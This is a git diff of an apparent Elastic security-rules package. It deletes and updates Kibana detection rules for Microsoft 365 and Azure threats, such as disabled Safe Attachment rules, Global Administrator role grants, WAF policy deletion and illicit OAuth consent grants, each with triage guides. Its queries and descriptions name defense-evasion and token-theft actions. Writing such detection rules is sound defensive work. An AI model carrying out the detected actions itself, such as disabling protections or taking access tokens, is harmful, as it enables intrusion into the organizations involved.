diff --git a/packages/security_detection_engine/changelog.yml b/packages/security_detection_engine/changelog.yml index 2d079aa0a11..b71cfad6263 100644 --- a/packages/security_detection_engine/changelog.yml +++ b/packages/security_detection_engine/changelog.yml @@ -1,5 +1,10 @@ # newer versions go on top # NOTE: please use pre-release versions (e.g. -beta.0) until a package is ready for production +- version: 8.19.9-beta.1 + changes: + - description: Release security rules update + type: enhancement + link: https://github.com/elastic/integrations/pull/15680 - version: 8.19.8 changes: - description: Release security rules update diff --git a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_207.json b/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_207.json deleted file mode 100644 index 6ad4a2af5e4..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0136b315-b566-482f-866c-1d8e2477ba16_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center.", - "false_positives": [ - "A user sending emails using personal distribution folders may trigger the event." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 User Restricted from Sending Email", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 User Restricted from Sending Email\n\nMicrosoft 365 enforces email sending limits to prevent abuse and ensure service integrity. Adversaries may exploit compromised accounts to send spam or phishing emails, triggering these limits. 
The detection rule monitors audit logs for successful restrictions by the Security Compliance Center, indicating potential misuse of valid accounts, aligning with MITRE ATT&CK's Initial Access tactic.\n\n### Possible investigation steps\n\n- Review the audit logs in Microsoft 365 to confirm the event details, focusing on entries with event.dataset:o365.audit and event.provider:SecurityComplianceCenter to ensure the restriction was logged correctly.\n- Identify the user account that was restricted by examining the event.action:\"User restricted from sending email\" and event.outcome:success fields to understand which account triggered the alert.\n- Investigate the recent email activity of the restricted user account to determine if there was any unusual or suspicious behavior, such as a high volume of outbound emails or patterns consistent with spam or phishing.\n- Check for any recent changes in account permissions or configurations that might indicate unauthorized access or compromise, aligning with the MITRE ATT&CK technique T1078 for Valid Accounts.\n- Assess whether there are any other related alerts or incidents involving the same user or similar patterns, which could indicate a broader security issue or coordinated attack.\n\n### False positive analysis\n\n- High-volume legitimate email campaigns by marketing or communication teams can trigger sending limits. Coordinate with these teams to understand their schedules and create exceptions for known campaigns.\n- Automated systems or applications using Microsoft 365 accounts for sending notifications or alerts may exceed limits. Identify these accounts and consider using service accounts with appropriate permissions and limits.\n- Users with delegated access to multiple mailboxes might inadvertently trigger restrictions. Review and adjust permissions or create exceptions for these users if their activity is verified as legitimate.\n- Temporary spikes in email activity due to business needs, such as end-of-quarter communications, can cause false positives. Monitor these periods and adjust thresholds or create temporary exceptions as needed.\n- Misconfigured email clients or scripts that repeatedly attempt to send emails can appear as suspicious activity. 
Ensure proper configuration and monitor for any unusual patterns that may need exceptions.\n\n### Response and remediation\n\n- Immediately disable the compromised user account to prevent further unauthorized email activity and potential spread of phishing or spam.\n- Conduct a password reset for the affected account and enforce multi-factor authentication (MFA) to enhance security and prevent future unauthorized access.\n- Review the audit logs for any additional suspicious activities associated with the compromised account, such as unusual login locations or times, and investigate any anomalies.\n- Notify the affected user and relevant stakeholders about the incident, providing guidance on recognizing phishing attempts and securing their accounts.\n- Escalate the incident to the security operations team for further analysis and to determine if other accounts or systems have been compromised.\n- Implement additional email filtering rules to block similar phishing or spam patterns identified in the incident to prevent recurrence.\n- Update and enhance detection rules and monitoring to quickly identify and respond to similar threats in the future, leveraging insights from the current incident.", - "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"User restricted from sending email\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "0136b315-b566-482f-866c-1d8e2477ba16", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "0136b315-b566-482f-866c-1d8e2477ba16_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_207.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_207.json deleted file mode 100644 index 5fe786f4014..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_207.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a safe attachment rule is disabled in Microsoft 365. 
Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses.", - "false_positives": [ - "A safe attachment rule may be disabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Safe Attachment Rule Disabled", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Safe Attachment Rule Disabled\n\nMicrosoft 365's Safe Attachment feature enhances security by analyzing email attachments in a secure environment to detect unknown malware. Disabling this rule can expose organizations to threats by allowing potentially harmful attachments to bypass scrutiny. Adversaries may exploit this to exfiltrate data or avoid detection. The detection rule monitors audit logs for successful attempts to disable this feature, signaling potential defense evasion activities.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action \"Disable-SafeAttachmentRule\" to identify the user or account responsible for the action.\n- Check the event.outcome field to confirm the success of the rule being disabled and gather additional context from related logs around the same timestamp.\n- Investigate the event.provider \"Exchange\" to determine if there are any other recent suspicious activities or changes made by the same user or account.\n- Assess the event.category \"web\" to understand if there were any web-based interactions or anomalies that coincide with the disabling of the safe attachment rule.\n- Evaluate the risk score and severity to prioritize the investigation and determine if immediate action is required to mitigate potential threats.\n- Cross-reference the identified user or account with known insider threat indicators or previous security incidents to assess the likelihood of malicious intent.\n\n### False positive analysis\n\n- Routine administrative changes can trigger alerts when IT staff disable Safe Attachment rules for legitimate reasons, such as testing or maintenance. To manage this, create exceptions for known administrative accounts or scheduled maintenance windows.\n- Automated scripts or third-party tools used for email management might disable Safe Attachment rules as part of their operations. Identify these tools and exclude their actions from triggering alerts by whitelisting their associated accounts or IP addresses.\n- Changes in organizational policy or security configurations might necessitate temporary disabling of Safe Attachment rules. Document these policy changes and adjust the monitoring rules to account for these temporary exceptions.\n- Training or onboarding sessions for new IT staff might involve disabling Safe Attachment rules as part of learning exercises. 
Ensure these activities are logged and excluded from alerts by setting up temporary exceptions for training periods.\n\n### Response and remediation\n\n- Immediately re-enable the Safe Attachment Rule in Microsoft 365 to restore the security posture and prevent further exposure to potentially harmful attachments.\n- Conduct a thorough review of recent email logs and quarantine any suspicious attachments that were delivered during the period the rule was disabled.\n- Isolate any systems or accounts that interacted with suspicious attachments to prevent potential malware spread or data exfiltration.\n- Escalate the incident to the security operations team for further investigation and to determine if there was any unauthorized access or data compromise.\n- Implement additional monitoring on the affected accounts and systems to detect any signs of ongoing or further malicious activity.\n- Review and update access controls and permissions to ensure that only authorized personnel can modify security rules and configurations.\n- Conduct a post-incident analysis to identify the root cause and implement measures to prevent similar incidents, such as enhancing alerting mechanisms for critical security rule changes.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeAttachmentRule\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_103.json b/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_103.json deleted file mode 100644 index 94e6067a2e8..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_103.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. 
The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure AD Global Administrator Role Assigned", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure AD Global Administrator Role Assigned\n\nAzure AD's Global Administrator role grants comprehensive access to manage Azure AD and associated services. Adversaries may exploit this by assigning themselves or others to this role, ensuring persistent control over resources. The detection rule identifies such unauthorized assignments by monitoring specific audit logs for role changes, focusing on the addition of members to the Global Administrator role, thus helping to mitigate potential security breaches.\n\n### Possible investigation steps\n\n- Review the Azure audit logs to identify the user account that performed the \"Add member to role\" operation, focusing on the specific event dataset and operation name.\n- Verify the identity of the user added to the Global Administrator role by examining the modified properties in the audit logs, specifically the new_value field indicating \"Global Administrator\".\n- Check the history of role assignments for the identified user to determine if this is a recurring pattern or a one-time event.\n- Investigate the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access.\n- Review any recent changes or activities performed by the newly assigned Global Administrator to identify any suspicious actions or configurations that may have been altered.\n- Consult with the organization's IT or security team to confirm if the role assignment was authorized and aligns with current administrative needs or projects.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role temporarily for maintenance or configuration purposes. To manage this, create exceptions for known IT personnel or scheduled maintenance windows.\n- Automated scripts or third-party applications that require elevated permissions might be flagged if they are configured to add users to the Global Administrator role. Review and whitelist these scripts or applications if they are verified as safe and necessary for operations.\n- Organizational changes, such as mergers or restructuring, can lead to legitimate role assignments that appear suspicious. Implement a review process to verify these changes and exclude them from triggering alerts if they align with documented organizational changes.\n- Training or onboarding sessions for new IT staff might involve temporary assignment to the Global Administrator role. 
Establish a protocol to document and exclude these training-related assignments from detection alerts.\n\n### Response and remediation\n\n- Immediately remove any unauthorized users from the Global Administrator role to prevent further unauthorized access and control over Azure AD resources.\n- Conduct a thorough review of recent audit logs to identify any additional unauthorized changes or suspicious activities associated with the compromised account or role assignments.\n- Reset the credentials of the affected accounts and enforce multi-factor authentication (MFA) to enhance security and prevent further unauthorized access.\n- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement conditional access policies to restrict Global Administrator role assignments to specific, trusted locations or devices.\n- Review and update role assignment policies to ensure that only a limited number of trusted personnel have the ability to assign Global Administrator roles.\n- Enhance monitoring and alerting mechanisms to detect similar unauthorized role assignments in the future, ensuring timely response to potential threats.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.properties.category:RoleManagement and\nazure.auditlogs.operation_name:\"Add member to role\" and\nazure.auditlogs.properties.target_resources.0.modified_properties.1.new_value:\"\\\"Global Administrator\\\"\"\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.category", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.1.new_value", - "type": "unknown" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "04c5a96f-19c5-44fd-9571-a0b033f9086f", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.003", - "name": "Additional Cloud Roles", - "reference": "https://attack.mitre.org/techniques/T1098/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "04c5a96f-19c5-44fd-9571-a0b033f9086f_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_103.json b/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_103.json deleted file mode 100644 index 3fe2e584212..00000000000 --- 
a/packages/security_detection_engine/kibana/security_rule/09d028a5-dcde-409f-8ae0-557cef1b7082_103.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies the deletion of a Frontdoor Web Application Firewall (WAF) Policy in Azure. An adversary may delete a Frontdoor Web Application Firewall (WAF) Policy in an attempt to evade defenses and/or to eliminate barriers to their objective.", - "false_positives": [ - "Azure Front Web Application Firewall (WAF) Policy deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Azure Front Web Application Firewall (WAF) Policy deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Frontdoor Web Application Firewall (WAF) Policy Deleted", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Frontdoor Web Application Firewall (WAF) Policy Deleted\n\nAzure Frontdoor WAF policies are crucial for protecting web applications by filtering and monitoring HTTP requests to block malicious traffic. Adversaries may delete these policies to bypass security measures, facilitating unauthorized access or data exfiltration. The detection rule identifies such deletions by monitoring Azure activity logs for specific delete operations, signaling potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by filtering for the operation name \"MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE\" and ensure the event outcome is marked as Success.\n- Identify the user or service principal responsible for the deletion by examining the associated user identity information in the activity logs.\n- Check the timestamp of the deletion event to determine if it coincides with any other suspicious activities or alerts in the environment.\n- Investigate the context of the deletion by reviewing any recent changes or incidents involving the affected Azure Frontdoor instance or related resources.\n- Assess the impact of the deletion by identifying which web applications were protected by the deleted WAF policy and evaluating their current exposure to threats.\n- Review access logs and network traffic for the affected web applications to detect any unusual or unauthorized access attempts following the policy deletion.\n\n### False positive analysis\n\n- Routine maintenance or updates by authorized personnel may lead to the deletion of WAF policies. To manage this, create exceptions for known maintenance windows or specific user accounts responsible for these tasks.\n- Automated scripts or tools used for infrastructure management might delete and recreate WAF policies as part of their normal operation. 
Identify these scripts and exclude their activity from triggering alerts.\n- Changes in organizational policy or architecture could necessitate the removal of certain WAF policies. Document these changes and adjust the detection rule to account for them by excluding specific policy names or identifiers.\n- Test environments may frequently add and remove WAF policies as part of development cycles. Consider excluding activity from test environments by filtering based on resource group names or tags associated with non-production environments.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure Frontdoor instance to prevent further unauthorized access or data exfiltration.\n- Review Azure activity logs to identify the user or service principal responsible for the deletion and assess their access permissions.\n- Recreate the deleted WAF policy using the latest backup or configuration template to restore security controls.\n- Implement conditional access policies to restrict access to Azure management operations, ensuring only authorized personnel can modify WAF policies.\n- Notify the security operations team and relevant stakeholders about the incident for further investigation and monitoring.\n- Conduct a post-incident review to identify gaps in security controls and update incident response plans accordingly.\n- Enhance monitoring by setting up alerts for any future deletions of critical security policies to ensure rapid detection and response.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/FRONTDOORWEBAPPLICATIONFIREWALLPOLICIES/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#networking" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "09d028a5-dcde-409f-8ae0-557cef1b7082", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Network Security Monitoring", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "09d028a5-dcde-409f-8ae0-557cef1b7082_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0c3c80de-08c2-11f0-bd11-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/0c3c80de-08c2-11f0-bd11-f661ea17fbcc_2.json deleted file mode 100644 index e86c0b1a8ee..00000000000 --- 
a/packages/security_detection_engine/kibana/security_rule/0c3c80de-08c2-11f0-bd11-f661ea17fbcc_2.json +++ /dev/null @@ -1,133 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a Microsoft 365 illicit consent grant request on behalf of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources in Microsoft 365. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client application to access resources in Microsoft 365 on behalf of the user.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-o365**" - ], - "investigation_fields": { - "field_names": [ - "@timestamp", - "event.action", - "event.outcome", - "o365.audit.UserId", - "o365.audit.ObjectId", - "o365.audit.Actor.Type", - "o365.audit.Target.Type", - "o365.audit.ModifiedProperties.ConsentAction_Reason.NewValue", - "o365.audit.ExtendedProperties.additionalDetails", - "cloud.region" - ] - }, - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Illicit Consent Grant via Registered Application", - "new_terms_fields": [ - "o365.audit.UserId", - "o365.audit.ObjectId" - ], - "note": "## Triage and analysis\n\n### Investigating Microsoft 365 Illicit Consent Grant via Registered Application\n\nAdversaries may register a malicious application in Microsoft Entra ID and trick users into granting excessive permissions via OAuth consent. These apps can access sensitive Microsoft 365 data\u2014such as mail, profiles, and files\u2014on behalf of the user once consent is granted. This activity is often initiated through spearphishing campaigns that direct the user to a pre-crafted OAuth consent URL.\n\nThis rule identifies a new consent grant to an application using Microsoft 365 audit logs. Additionally, this is a New Terms rule that will only trigger if the user and client ID have not been seen doing this activity in the last 14 days.\n\n#### Possible investigation steps\n\n- **Review the app in Entra ID**:\n - Go to **Enterprise Applications** in the Azure portal.\n - Search for the `AppId` or name from `o365.audit.ObjectId`.\n - Review granted API permissions and whether admin consent was required.\n - Check the `Publisher` and `Verified` status.\n\n- **Assess the user who granted consent**:\n - Investigate `o365.audit.UserId` (e.g., `terrance.dejesus@...`) for signs of phishing or account compromise.\n - Check if the user was targeted in recent phishing simulations or campaigns.\n - Review the user\u2019s sign-in logs for suspicious geolocation, IP, or device changes.\n\n- **Determine scope and risk**:\n - Use the `ConsentContext_IsAdminConsent` and `ConsentContext_OnBehalfOfAll` flags to assess privilege level.\n - If `offline_access` or `Mail.Read` was granted, consider potential data exposure.\n - Cross-reference affected `Target` objects with known business-critical assets or data owners.\n\n- **Correlate additional telemetry**:\n - Review logs from Defender for Cloud Apps (MCAS), Microsoft Purview, or other DLP tooling for unusual access patterns.\n - Search for `AppId` across your tenant to determine how widely it's used.\n\n### False positive analysis\n\n- Not all consent grants are malicious. 
Verify if the app is business-approved, listed in your app catalog, or commonly used by users in that role or department.\n- Consent reasons like `WindowsAzureActiveDirectoryIntegratedApp` could relate to integrated services, though these still require verification.\n\n### Response and remediation\n\n- **If the app is confirmed malicious**:\n - Revoke OAuth consent using the [Microsoft Graph API](https://learn.microsoft.com/en-us/graph/api/oauth2permissiongrant-delete).\n - Remove any related service principals from Entra ID.\n - Block the app via the Conditional Access \"Grant\" control or Defender for Cloud Apps policies.\n - Revoke refresh tokens and require reauthentication for affected users.\n - Notify end-users and IT of the potential exposure.\n - Activate your phishing or OAuth abuse response playbook.\n\n- **Prevent future misuse**:\n - Enable the [Admin consent workflow](https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow) to restrict user-granted consent.\n - Audit and reduce overprivileged applications in your environment.\n - Consider using Defender for Cloud Apps OAuth app governance.\n\n", - "query": "event.dataset: \"o365.audit\"\n and o365.audit.Actor.Type: 5\n and event.action: \"Consent to application.\"\n and event.outcome: \"success\"\n and o365.audit.Target.Type: (0 or 2 or 3 or 9 or 10)\n", - "references": [ - "https://www.wiz.io/blog/midnight-blizzard-microsoft-breach-analysis-and-best-practices", - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", - "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", - "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps", - "https://learn.microsoft.com/en-us/office/office-365-management-api/office-365-management-activity-api-schema" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.11.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Actor.Type", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.Target.Type", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "0c3c80de-08c2-11f0-bd11-f661ea17fbcc", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", - "Tactic: Credential Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/", - "subtechnique": [ - { - "id": "T1566.002", - "name": "Spearphishing Link", - "reference": "https://attack.mitre.org/techniques/T1566/002/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } 
- ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 2 - }, - "id": "0c3c80de-08c2-11f0-bd11-f661ea17fbcc_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0d3d2254-2b4a-11f0-a019-f661ea17fbcc_5.json b/packages/security_detection_engine/kibana/security_rule/0d3d2254-2b4a-11f0-a019-f661ea17fbcc_5.json index 76dedd3da85..cd10cb4c923 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d3d2254-2b4a-11f0-a019-f661ea17fbcc_5.json +++ b/packages/security_detection_engine/kibana/security_rule/0d3d2254-2b4a-11f0-a019-f661ea17fbcc_5.json @@ -19,6 +19,12 @@ "https://github.com/dirkjanm/ROADtools", "https://attack.mitre.org/techniques/T1078/004/" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 47, "rule_id": "0d3d2254-2b4a-11f0-a019-f661ea17fbcc", "setup": "#### Required Microsoft Entra ID Sign-In and Graph Activity Logs\nThis rule requires the Microsoft Entra ID Sign-In Logs and Microsoft Graph Activity Logs integration to be enabled and configured to collect audit and activity logs via Azure Event Hub.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_103.json b/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_103.json index db5efb7cc11..8495a712164 100644 --- a/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0_103.json @@ -41,6 +41,13 @@ "references": [ "https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^4.0.0" + } + ], "risk_score": 47, "rule_id": "0d92d30a-5f3e-4b71-bc3d-4a0c4914b7e0", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_207.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_207.json deleted file mode 100644 index 63d80a48571..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_207.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the occurrence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment.", - "false_positives": [ - "Benign files can trigger signatures in the built-in virus protection" - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "SharePoint Malware File Upload", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. 
